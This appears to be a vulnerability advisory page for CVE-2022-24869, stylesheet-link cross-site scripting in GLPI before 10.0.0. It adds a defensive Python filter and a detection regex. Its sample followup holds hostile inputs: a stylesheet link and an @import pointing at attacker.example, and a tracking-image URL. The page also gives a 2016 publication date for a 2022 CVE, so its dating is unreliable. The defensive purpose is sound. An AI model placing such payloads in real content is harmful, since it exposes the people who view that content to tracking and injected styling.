PT-2022-7408 · Glpi+2
Ariane
+1
Published 2016-08-25 · Updated 2024-07-26
CVE-2022-24869
CVSS v2.0
5.5
Medium
| Vector | AV:N/AC:L/Au:S/C:P/I:P/A:N |
Name of the Vulnerable Software and Affected Versions
GLPI versions prior to 10.0.0
Description
GLPI renders ticket followups and the configurable setup login messages as HTML, and a stylesheet link placed in either of them (for example a link element pointing at an attacker-controlled host) is rendered for every user who views the content. An authenticated user who can create such content (the CVSS vector requires single authentication) therefore gains a cross-site scripting vector. The browser's cross-origin restrictions (described as CORS in the upstream advisory) partially mitigate the impact but do not remove it, so users are still advised to upgrade.
Recommendations
For versions prior to 10.0.0, upgrade to GLPI 10.0.0 or later, which resolves the issue. Until the upgrade can be applied, disable or strip stylesheet links in ticket followups and setup login messages, and restrict who may create followups or edit the login message to minimise the exposed attack surface.
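One way to implement the interim workaround above, as an added example that is not GLPI's own code: a small Python filter that strips the constructs through which an HTML fragment can pull in a stylesheet (`<link>` elements, `<style>` blocks that may carry `@import`, and inline `style` attributes referencing `url(...)` or `@import`) and reports what it removed so the event can be logged. The sample followup content is constructed for the example; GLPI's actual storage format and rich-text editor are not represented, and the list of dangerous inline-style constructs is a design choice of this example.

```python
"""Strip stylesheet links from user-supplied HTML fragments.

Added example, not GLPI code. The constructs removed are the ones through
which a fragment can load an external stylesheet: <link> elements, <style>
blocks (which may carry @import), and inline style attributes that reference
url(...) or @import. Everything else passes through re-serialised.
"""
import re
from html import escape
from html.parser import HTMLParser

# Whole element dropped. <link> has no legitimate use in user content, and
# <style> content is dropped with it because it may carry @import.
DROPPED_TAGS = {"link", "style"}

# Inline-style constructs that fetch a remote resource (or, in legacy
# engines, run script); a style attribute matching this is removed.
INLINE_STYLE_DANGER = re.compile(r"@import|url\s*\(|expression\s*\(", re.IGNORECASE)


class StylesheetStripper(HTMLParser):
    """Re-serialises an HTML fragment minus stylesheet-loading constructs."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # re-serialised output chunks
        self.findings = []     # human-readable record of what was removed
        self._in_style = 0     # >0 while inside a dropped <style> element

    def _filter_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            if name.lower() == "style" and value and INLINE_STYLE_DANGER.search(value):
                self.findings.append(f"style attribute on <{tag}> removed: {value!r}")
                continue
            kept.append((name, value))
        return kept

    @staticmethod
    def _render_start(tag, attrs, self_closing=False):
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        if tag in DROPPED_TAGS:
            self.findings.append(f"<{tag}> element removed")
            if tag == "style":
                self._in_style += 1
            return
        if not self._in_style:
            self.out.append(self._render_start(tag, self._filter_attrs(tag, attrs)))

    def handle_startendtag(self, tag, attrs):
        if tag in DROPPED_TAGS:
            self.findings.append(f"<{tag}> element removed")
            return
        if not self._in_style:
            self.out.append(self._render_start(tag, self._filter_attrs(tag, attrs), True))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = max(0, self._in_style - 1)
            return
        if tag != "link" and not self._in_style:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped on output, so decoded entities cannot become markup.
        if not self._in_style:
            self.out.append(escape(data, quote=False))


def strip_stylesheet_links(fragment):
    """Return (cleaned_html, findings) for one HTML fragment."""
    parser = StylesheetStripper()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.findings


# Constructed sample: a ticket followup carrying all three stylesheet vectors.
SAMPLE_FOLLOWUP = (
    "<p>Still broken after the update.</p>"
    '<link rel="stylesheet" href="https://attacker.example/evil.css">'
    '<style>@import url("https://attacker.example/evil.css");</style>'
    '<p style="background:url(https://attacker.example/track.png)">See screenshot.</p>'
)

if __name__ == "__main__":
    cleaned, findings = strip_stylesheet_links(SAMPLE_FOLLOWUP)
    print(cleaned)
    for finding in findings:
        print("removed:", finding)
```

Run the filter at the point where followup or login-message content is saved, not only when it is displayed, so that already-stored payloads are caught when records are re-saved and the findings list can be written to the audit log. Stripping rather than rejecting keeps the rest of the user's text intact, which matters for support tickets.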
Exploit
Fix
XSS
Affected Products
Alt Linux
Glpi
Red Os